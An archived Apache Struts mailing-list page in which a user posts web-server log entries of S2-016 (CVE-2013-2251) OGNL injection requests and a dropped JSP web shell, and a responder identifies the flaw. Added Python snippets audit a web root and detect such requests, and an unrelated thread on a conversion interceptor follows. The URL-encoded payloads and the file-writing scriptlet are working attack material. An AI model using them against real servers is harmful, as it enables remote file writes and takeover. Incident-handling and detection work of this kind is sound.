Re: Suspicious Request

2018-02-13 Thread Yasser Zamani


On 2/13/2018 3:57 PM, Rajvinder Pal wrote:
> I am using struts2 2.3.16.1 version. That may be the reason 404 error is
> returned. But still I got a new file "one.jsp", inside the WAR. It has
> only one IF condition as given below:-
> 
> <%if(request.getParameter("f")!=null)(new
> java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

Oh! Do you see the above block at the end of your index.jsp? If so, then the
attacker is or was able to append this block there!

Firstly delete that block and try the following to see if your webapp still
has this vulnerability via reproducing the attack:

> "GET
> /index.do?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
> HTTP/1.1" 404 206 14249 0
> ?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
> -
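
A way to check a deployment for what this message describes (a new JSP in the web root, or a block appended to index.jsp), as an added example that is not part of the original thread. The function names, paths and the sample WAR are hypothetical, and it assumes the original WAR file is still available as a baseline:

```python
import hashlib
import re
import tempfile
import zipfile
from pathlib import Path

# One scriptlet that uses a file-writing class followed by a request parameter.
WRITER_RE = re.compile(
    r"<%(?:(?!%>).)*?(?:FileOutputStream|FileWriter)(?:(?!%>).)*?request\.getParameter",
    re.S)

def audit_webroot(war_path, deployed_dir):
    """Compare an exploded web root with the WAR it was deployed from."""
    with zipfile.ZipFile(war_path) as war:
        baseline = {i.filename: hashlib.sha256(war.read(i)).hexdigest()
                    for i in war.infolist() if not i.is_dir()}
    report = {"added": [], "modified": [], "writer_scriptlet": []}
    root = Path(deployed_dir)
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        if rel not in baseline:
            report["added"].append(rel)            # e.g. a dropped one.jsp
        elif hashlib.sha256(data).hexdigest() != baseline[rel]:
            report["modified"].append(rel)         # e.g. a block appended to index.jsp
        if rel.lower().endswith((".jsp", ".jspx")) and WRITER_RE.search(
                data.decode("utf-8", "replace")):
            report["writer_scriptlet"].append(rel)
    return report

def demo():
    """Constructed input: a two-file WAR, then a tampered copy of its web root."""
    tmp = Path(tempfile.mkdtemp())
    war = tmp / "app.war"
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("index.jsp", "<html>home</html>")
        z.writestr("WEB-INF/web.xml", "<web-app/>")
    root = tmp / "webroot"
    with zipfile.ZipFile(war) as z:
        z.extractall(root)
    # The scriptlet quoted in the thread, used here only as detection input.
    block = ('<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream('
             'application.getRealPath("")+request.getParameter("f")))'
             '.write(request.getParameter("t").getBytes());%>')
    (root / "one.jsp").write_text(block)
    with open(root / "index.jsp", "a") as f:
        f.write(block)
    return audit_webroot(war, root)
```

Files the application legitimately writes into its web root at run time will also show up under "added", so the report is a triage list rather than a verdict.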



Re: Suspicious Request

2018-02-13 Thread Yasser Zamani


On 2/13/2018 12:34 PM, Rajvinder Pal wrote:
> Hi,
> 
> I have a struts application deployed on an application server. Sometimes I am
> receiving the below requests in web server logs. Not sure if I can post it
> in this struts forum. What should I do to restrict it? What kind of
> vulnerability is it?

Hi,

It seems it's S2-016 [1] (CVE-2013-2251 [2]).

[1] https://cwiki.apache.org/confluence/display/WW/S2-016
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251


-
To unsubscribe, e-mail: user-unsubscr...@struts.apache.org
For additional commands, e-mail: user-h...@struts.apache.org
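
Detection logic for this kind of request in an access log, as an added example that is not part of the original thread. It flags the `redirect:`, `redirectAction:` and `action:` parameter prefixes covered by S2-016 when they carry an OGNL expression, and undoes the quote-splitting seen in the `/admin/index.action` request; the function names and sample lines are constructed for illustration:

```python
import re
from urllib.parse import unquote_plus

# Parameter prefixes named in S2-016, followed by an OGNL ${...} or %{...} expression.
PREFIX_RE = re.compile(r"[?&](redirect|redirectAction|action):\s*[$%]\{(.*)", re.S)
# Adjacent string literals joined with '+', used to split class names past signatures.
CONCAT_RE = re.compile(r"""(['"])\s*\+\s*\1""")
# getRealPath("...") + "name": the file the expression tries to create in the web root.
DROP_RE = re.compile(r'getRealPath\("[^"]*"\)\s*\+\s*"([^"]+)"')
MARKERS = ("#context", "xwork2.dispatcher", "getWriter", "java.io.", "getRealPath")

def analyse(request_line):
    """Return a finding dict for an S2-016 style request line, or None."""
    decoded = unquote_plus(request_line)
    m = PREFIX_RE.search(decoded)
    if not m:
        return None
    expr = m.group(2)
    joined = CONCAT_RE.sub("", expr)   # 'co'+'m.open' -> 'com.open'
    drop = DROP_RE.search(joined)
    return {
        "prefix": m.group(1),
        "markers": [k for k in MARKERS if k in joined],
        "obfuscated": joined != expr,
        "dropped_file": drop.group(1) if drop else None,
    }

# Constructed sample lines, shortened from the shape of the requests in this thread.
SAMPLES = [
    "GET /index.do?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2."
    "dispatcher.HttpServletRequest'),new+java.io.FileWriter(%23req.getRealPath"
    "(%22/%22)%2b%22lndex.jsp%22)} HTTP/1.1",
    "GET /admin/index.action?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open"
    "%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq"
    "%27%2b%27uest%27)} HTTP/1.1",
    "GET /list.action?action:save=Submit HTTP/1.1",   # ordinary submit-button prefix
    "GET /index.action?redirect=/home.action HTTP/1.1",
]

def scan(lines):
    """Return (line_number, finding) pairs for the lines that match."""
    return [(n, f) for n, l in enumerate(lines, 1) if (f := analyse(l))]
```

The `dropped_file` field gives a file name to look for in the web root; the HTTP status in the log line says nothing about whether the expression was evaluated.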


Re: Suspicious Request

2018-02-13 Thread Rajvinder Pal
Hi Yasser,

I am using struts2 2.3.16.1 version. That may be the reason 404 error is
returned. But still I got a new file "one.jsp", inside the WAR. It has
only one IF condition as given below:-

<%if(request.getParameter("f")!=null)(new
java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

Regards,
Raj

On Tue, Feb 13, 2018 at 5:43 PM, Yasser Zamani wrote:

>
>
> On 2/13/2018 12:34 PM, Rajvinder Pal wrote:
> > Hi,
> >
> > I have a struts application deployed on an application server. Sometimes I
> > am receiving the below requests in web server logs. Not sure if I can post
> > it in this struts forum. What should I do to restrict it? What kind of
> > vulnerability is it?
>
> Hi,
>
> It seems it's S2-016 [1] (CVE-2013-2251 [2]).
>
> [1] https://cwiki.apache.org/confluence/display/WW/S2-016
> [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251


Suspicious Request

2018-02-13 Thread Rajvinder Pal
Hi,

I have a struts application deployed on an application server. Sometimes I am
receiving the below requests in web server logs. Not sure if I can post it
in this struts forum. What should I do to restrict it? What kind of
vulnerability is it?


"GET
/index.do?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
HTTP/1.1" 404 206 14249 0
?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
-
"GET
/index.php?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
HTTP/1.1" 404 207 1378 0
?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
-
"GET
/admin/index.action?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}
HTTP/1.1" 404 216 1634 0
?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}
-


Regards,
Raj


Conversion Error Interceptor prevent errors for empty values

2018-02-13 Thread Paul Zepernick
Can someone provide some clarification on if this interceptor should be adding
a field error when an empty string is passed to an Integer in the action?  I am
trying to prevent the field error from happening in this case.  It looks like 
it should not be happening according to the docs: 
https://struts.apache.org/core-developers/conversion-error-interceptor.html , 
or am I not understanding what it is saying here:

"This interceptor extends ConversionErrorInterceptor but only adds conversion 
errors from the ActionContext to the field errors of the action if the field 
value is not null, "", or {""} (a size 1 String array with only an empty 
String). See ConversionErrorInterceptor for more information, as well as the 
Type Conversion documentation"

Paul R. Zepernick
Sr. Programmer Analyst
HealthSmart Benefit Solutions



